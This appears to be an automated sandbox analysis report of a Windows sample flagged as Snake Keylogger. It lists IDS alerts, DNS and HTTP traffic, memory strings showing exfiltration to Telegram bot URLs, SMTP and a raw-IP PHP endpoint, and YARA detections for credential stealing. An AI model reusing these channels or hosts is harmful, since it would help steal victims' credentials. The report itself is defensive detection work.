Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49719 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49736 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49838 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49820 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49718 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49788 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49876 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49833 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49896 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49808 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49844 -> 104.21.16.1:443
Source: global traffic | TCP traffic: 192.168.2.6:49871 -> 3.130.71.34:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49826 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B2CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00B2CE44
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.acadental.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 18:11:00 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 10 Jan 2025 18:11:12 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.acadental.com
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003142000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000302A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000009.00000002.3370233231.0000000003179000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002D02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown | Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49913 version: TLS 1.2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B2EAFF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B2ED6A
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0095ED6A
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B2EAFF
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B1AA57
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B49576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B49576
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00979576

                System Summary

                barindex
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
